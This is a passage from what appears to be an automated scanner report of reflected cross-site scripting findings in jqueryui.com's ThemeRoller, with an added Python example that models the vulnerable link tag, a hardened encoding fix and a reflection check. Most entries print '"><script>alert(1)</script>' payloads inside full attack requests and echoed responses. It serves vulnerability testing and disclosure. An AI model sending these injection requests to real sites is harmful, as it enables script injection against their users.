_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a200d2"><script>alert(1)</script>efe4a57817&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

3.76. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff3a8"><script>alert(1)</script>25cc0117949 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaff3a8"><script>alert(1)</script>25cc0117949&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaff3a8"><script>alert(1)</script>25cc0117949&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

3.77. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7165b"><script>alert(1)</script>3b4b521d593 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa17165b"><script>alert(1)</script>3b4b521d593&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa17165b"><script>alert(1)</script>3b4b521d593&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

3.78. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46bd0"><script>alert(1)</script>574ccf7b54f was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999946bd0"><script>alert(1)</script>574ccf7b54f&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999946bd0"><script>alert(1)</script>574ccf7b54f&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...
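The following Python script is an added example written for this entry; it is not part of the XSS.CX report, the Burp scanner or jQuery UI's own code, and it never contacts jqueryui.com. It reconstructs the sink as a hypothetical template (render_link_vulnerable is an assumption modelled on the response snippets, not the real parseTheme.css.php include), puts the hardened form beside it, and provides the marker-based check a tester runs against a real response body to confirm the reflection the way the scanner did. Because all the ThemeRoller parameter entries in this section (3.78 through 3.89) reach the same attribute, this one example covers all of them. The payload and markers are those from 3.78; the abridged QUERY string and the STYLESHEET prefix are constructed from the request and response shown above.

```python
"""
Reconstruction of the ThemeRoller sink plus a reflection-confirmation check.
Added example for this report; not code from XSS.CX, Burp or jQuery UI.
The two render_* functions are hypothetical templates that reproduce the
behaviour visible in the response snippets (query string concatenated into
the href of a <link rel="stylesheet"> tag). Nothing here contacts jqueryui.com.
"""
from __future__ import annotations

import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlencode

# Payload and random markers exactly as submitted in borderColorHover (3.78).
PREFIX, SUFFIX = "46bd0", "574ccf7b54f"
PAYLOAD = PREFIX + '"><script>alert(1)</script>' + SUFFIX

# Abridged query string constructed from the 3.78 request (the real one has
# about sixty parameters; any of them reaches the same attribute).
QUERY = ("ffDefault=Verdana,Arial,sans-serif&cornerRadius=4px&bgColorHover=dadada"
         "&borderColorHover=999999" + PAYLOAD + "&fcHover=212121")

# Prefix of the stylesheet URL seen in the 3.79 / 3.88 / 3.89 response snippets.
STYLESHEET = "/themeroller/css/parseTheme.css.php?ctl=themeroller&"


def render_link_vulnerable(query: str) -> str:
    """Assumed vulnerable template: the raw query string is dropped into a
    double-quoted href, so a '"' in it ends the attribute and '>' ends the tag."""
    return (f'<link rel="stylesheet" href="{STYLESHEET}{query}"'
            ' type="text/css" media="all" />')


def render_link_hardened(query: str) -> str:
    """Fixed template, encoding for both contexts the value passes through:
    1. rebuild the query so every parameter value is percent-encoded ('"'
       becomes %22, '<' becomes %3C), which a URL requires anyway;
    2. entity-encode the whole URL for the attribute (html.escape with
       quote=True turns '&' into &amp; and any '"' into &quot;)."""
    safe_query = urlencode(parse_qsl(query, keep_blank_values=True))
    href = html.escape(STYLESHEET + safe_query, quote=True)
    return f'<link rel="stylesheet" href="{href}" type="text/css" media="all" />'


class _TagCollector(HTMLParser):
    """Collect (tag, attributes) for every start tag, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict[str, str | None]]] = []

    def handle_starttag(self, tag: str, attrs: list[tuple[str, str | None]]) -> None:
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str) -> list[tuple[str, dict[str, str | None]]]:
    """Tokenize the markup the way a browser would and return its start tags."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def script_injected(markup: str) -> bool:
    """True when tokenizing yields a <script> element: the attribute breakout worked."""
    return any(tag == "script" for tag, _ in parse_tags(markup))


def reflected_between_markers(body: str, prefix: str = PREFIX, suffix: str = SUFFIX) -> str | None:
    """Scanner-style check on a real response body: return the text the server
    echoed between the two unique markers, or None if it was not reflected."""
    start = body.find(prefix)
    if start < 0:
        return None
    end = body.find(suffix, start + len(prefix))
    if end < 0:
        return None
    return body[start + len(prefix):end]


def confirms_xss(body: str) -> bool:
    """The finding is confirmed only if the echoed text still holds the raw '"'
    and '<' that were sent; a percent- or entity-encoded echo cannot break out."""
    echoed = reflected_between_markers(body)
    return echoed is not None and '"' in echoed and "<" in echoed


if __name__ == "__main__":
    vulnerable = render_link_vulnerable(QUERY)
    hardened = render_link_hardened(QUERY)
    print("vulnerable:", confirms_xss(vulnerable), script_injected(vulnerable))
    print("hardened:  ", confirms_xss(hardened), script_injected(hardened))
```

Run as a script it prints True True for the vulnerable template and False False for the hardened one. The hardened version does not try to strip <script>; it encodes for the two contexts the value passes through (percent-encoding for the URL, then entity-encoding for the attribute), which is what closes every parameter in this report at once. To confirm a finding against a live response, save the body and call confirms_xss on it with the markers you submitted.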

3.79. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the double-quoted href attribute of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php (the tag is visible in the response snippet below); this is the same sink as the other ThemeRoller parameter findings in this section. The payload da997"><script>alert(1)</script>393dd978478 was submitted in the cornerRadius parameter and was echoed unmodified in the response, so the " closes the attribute value, the > closes the tag, and the <script> element that follows is parsed and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxda997"><script>alert(1)</script>393dd978478&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxda997"><script>alert(1)</script>393dd978478&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

3.80. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the double-quoted href attribute of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php; because this is the last parameter in the query string, the response snippet below shows the payload immediately followed by the tag's closing " type="text/css" media="all" />. It is the same sink as the other ThemeRoller parameter findings in this section. The payload 3e7ae"><script>alert(1)</script>8978ab3951d was submitted in the cornerRadiusShadow parameter and was echoed unmodified in the response, so the " closes the attribute value, the > closes the tag, and the <script> element that follows is parsed and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px3e7ae"><script>alert(1)</script>8978ab3951d HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px3e7ae"><script>alert(1)</script>8978ab3951d" type="text/css" media="all" />
...[SNIP]...

3.81. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the double-quoted href attribute of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php (the response snippet below shows the reflection inside that stylesheet query string); this is the same sink as the other ThemeRoller parameter findings in this section. The payload 4728a"><script>alert(1)</script>e4181889fbb was submitted in the fcActive parameter and was echoed unmodified in the response, so the " closes the attribute value, the > closes the tag, and the <script> element that follows is parsed and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=2121214728a"><script>alert(1)</script>e4181889fbb&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=2121214728a"><script>alert(1)</script>e4181889fbb&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

3.82. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the double-quoted href attribute of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php (the response snippet below shows the reflection inside that stylesheet query string); this is the same sink as the other ThemeRoller parameter findings in this section. The payload 69af0"><script>alert(1)</script>18274536c6e was submitted in the fcContent parameter and was echoed unmodified in the response, so the " closes the attribute value, the > closes the tag, and the <script> element that follows is parsed and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222269af0"><script>alert(1)</script>18274536c6e&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222269af0"><script>alert(1)</script>18274536c6e&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

3.83. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the double-quoted href attribute of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php (the response snippet below shows the reflection inside that stylesheet query string); this is the same sink as the other ThemeRoller parameter findings in this section. The payload dbdc8"><script>alert(1)</script>192e61c2ff2 was submitted in the fcDefault parameter and was echoed unmodified in the response, so the " closes the attribute value, the > closes the tag, and the <script> element that follows is parsed and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555dbdc8"><script>alert(1)</script>192e61c2ff2&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
